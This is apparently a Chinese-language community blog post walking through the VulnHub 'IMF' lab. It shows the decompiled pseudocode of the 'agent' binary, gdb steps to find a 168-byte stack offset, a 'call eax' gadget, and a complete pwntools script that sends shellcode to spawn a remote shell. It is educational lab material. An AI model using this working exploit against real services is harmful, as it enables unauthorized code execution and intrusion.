vulnhub_IMF缓冲区溢出详解

举报
亿人安全 发表于 2023/05/30 10:42:32 2023/05/30
【摘要】 由于此靶机已被大佬们发过很多复现过程,这里主要介绍一下针对缓冲区溢出漏洞的思路。由于此靶机已被大佬们发过很多复现过程,这里主要介绍一下针对缓冲区溢出漏洞的思路。一、文件分析1.1 查看文件保护首先使用 file 命令查看文件信息file agentchecksec agent可以看到文件基本信息:32 位、小端序、动态链接程序,且存在可读可写可执行段1.2 伪代码分析将 agent 文件拖入...

由于此靶机已被大佬们发过很多复现过程,这里主要介绍一下针对缓冲区溢出漏洞的思路。

由于此靶机已被大佬们发过很多复现过程,这里主要介绍一下针对缓冲区溢出漏洞的思路。

一、文件分析

1.1 查看文件保护

首先使用 file 命令查看文件信息

file agent
checksec agent

图片
可以看到文件基本信息:32 位、小端序、动态链接程序,且存在可读可写可执行段

1.2 伪代码分析

将 agent 文件拖入 32 位的 IDA 中进行分析
按 shift+f12 没找到 system('/bin/sh') 相关内容
按 F5 查看伪代码

int __cdecl main(int argc, const char **argv, const char **envp)
{
  int result; // eax
  char *s2; // [esp+8h] [ebp-20h] BYREF
  char s[10]; // [esp+Eh] [ebp-1Ah] BYREF
  int v6; // [esp+18h] [ebp-10h]
  char v7; // [esp+1Fh] [ebp-9h]

  setbuf(stdout, 0);
  asprintf(&s2, "%i", 48093572); 
  //asprintf()可以说是一个增强版的sprintf(),在不确定字符串的长度时,能够根据格式化的字符串长度,申请足够的内存空间。

  puts("  ___ __  __ ___ ");
  puts(" |_ _|  \\/  | __|  Agent");
  puts("  | || |\\/| | _|   Reporting");
  puts(" |___|_|  |_|_|    System\n");
  printf("\nAgent ID : ");
  if ( !fgets(s, 9, stdin) )
    return -1;
  if ( !strncmp(s, s2, 8u) ) //strncmp函数为字符串比较函数,功能是把 str1 和 str2 进行比较,最多比较前 n 个字节,若str1与str2的前n个字符相同,则返回0;若s1大于s2,则返回大于0的值;若s1 小于s2,则返回小于0的值。
  {
    do
      v7 = getchar();
    while ( v7 != 10 && v7 != -1 );
    puts("Login Validated ");
    v6 = menu();
    switch ( v6 )
    {
      case 1:
        extractionpoints();
        break;
      case 2:
        requestextraction();
        break;
      case 3:
        report(); //溢出函数
        break;
      default:
        puts("Exiting...");
        break;
    }
    result = 0;
  }
  else
  {
    puts("Invalid Agent ID ");
    result = -2;
  }
  return result;
}

下面是溢出函数 report

{
  char s[152]; // [esp+4h] [ebp-A4h] BYREF
  char *v2; // [esp+9Ch] [ebp-Ch]

  printf("\nEnter report update: ");
  gets(s); //溢出点
  printf("Report: %s\n", s);
  puts("Submitted for review.");
  v2 = s;
  return s;
}

看完伪代码后总结下,溢出的位置不难找,只要控制 report 中的 gets 函数读入填充的数据,即可产生栈溢出,但是没有 shellcode,需要我们自己写入 RWX 段,然后将函数的返回地址改为 shellcode 地址

1.3 gdb 分析

使用 gdb 分析,计算栈偏移,首先在 fgets 函数那里打个断点
图片

gdb ./agent
b *0x8048697
r
n

然后输入 48093572(这里主要是越过 strncmp 函数,需要让 S2 与 S 相同)

图片

之后一直按 n 步过到 menu,输入 3 进入 report 函数

图片

执行到 call report 这里步过之后,按 s 步入,之后继续步过到 gets 函数,输入'AAAAAAAA'

图片

输入 stack48 在栈中找到 EBP 和字符串'AAAAAAAA'的位置

stack 48

输入的'AAAAAAAA'在 eax 中,位置如下:

图片

指向栈低的指针 EBP 位置如下:

图片

从而计算得出栈偏移为

栈偏移 = EBP地址 - 当前输入地址 + EBP字长
       = 0xd188 - 0xd0e4 + 4 = 168

找到栈偏移之后,我们需要将 return 地址修改为 shellcode 地址,这里可以使用 ROPgadget 寻找包含 call eax 的代码段,这里找到 call eax 地址为 0x8048563

ROPgadget --binary agent | grep "call eax"
图片

二、EXP 编写

这里放上自己用 pwntools,通过 asm 构造 shellcode 内容,需要安装 pwntools 库,写完之后直接运行就 getshell 了

from pwn import *
io = remote("192.168.56.6", 7788)   //需修改为靶机IP、端口
shellcode = asm(shellcraft.sh()) //生成payload
shell_addr = 0x8048563 //call eax的地址
io.recvuntil(b"Agent ID : ")
io.send(b"48093572\n") //绕过strncmp函数
io.recvuntil(b"Enter selection: ")
io.send(b"3\n") //选择进入report函数
io.recv()
io.sendline(shellcode + b"A" * (168 - len(shellcode))  + p32(shell_addr))
io.interactive()
python3 shell.exp
图片
【版权声明】本文为华为云社区用户原创内容,转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息, 否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。